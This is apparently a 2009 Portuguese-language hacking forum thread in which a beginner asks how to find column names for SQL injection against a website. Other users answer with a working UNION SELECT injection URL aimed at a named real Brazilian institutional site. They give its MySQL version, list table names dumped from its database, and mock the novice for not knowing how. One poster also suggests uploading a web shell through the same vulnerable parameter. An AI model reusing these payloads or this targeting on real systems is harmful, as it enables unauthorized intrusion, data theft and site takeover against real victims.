/DUVIDA/sql injection não consigo achar a coluna de um site

pinguinacs · 24 de December , 2009, 04:53:43 PM

oks valews más voce pode me dar umas dicas de palavras que podem estar no nome das colunas ou tabelas ??

Joey · 24 de December , 2009, 05:32:47 PM

Porra, pelo visto você não leu absolutamente nada do que eu postei né?
Não precisa chutar nenhuma tabela, a versão do mysql é 5. (5.0.32-Debian_7etch5-log), você pode pegar as tabelas pelo information_schema.tables!

Quotehttp://www.ibict.br/noticia.php?id=-676%20union%20all%20select%201,table_name%20from%20information_schema.tables%20limit%2021,21--

pinguinacs · 24 de December , 2009, 08:57:29 PM

vichiii nem sei ver a versão affs vou estudar mais esquece

Reeves · 24 de December , 2009, 11:05:50 PM

sim kra estude...
o kra te passo a versão e ainda passo a query para ver as tabelas no banco...
'http://www.ibict.br/noticia.php?id=-676%20union%20all%20select%201,table_name%20from%20information_schema.tables%20limit%2021,21--'
mais bonznho que isso impossivel, basta tu mandar o que quiser.
as tabelas do banco são:
arquiv_secoes, arquivos, atalho, chamadas, concursos, log_adm, noticia, portais, pro_links,pro_outros, prossiga1, prossiga2, revistas_seer, revistas_seer_teste.........
ok ok, tem mta tabela!
mas se vc não sabe sql e banco, nada feito né ;)
uhauhaUHAHUauhaahuahau

xD

da até para fazer upload de shell usando esse input, mysql de perna aberta

pinguinacs · 25 de December , 2009, 10:09:04 PM

antes de tudo desculpe a demora da respota motivo FESTAS é natal XD

upload de shel como assim tipo PHP injection NOSSA CURTI em

FORUM DARKERS

/DUVIDA/sql injection não consigo achar a coluna de um site

pinguinacs

Joey

pinguinacs

Reeves

pinguinacs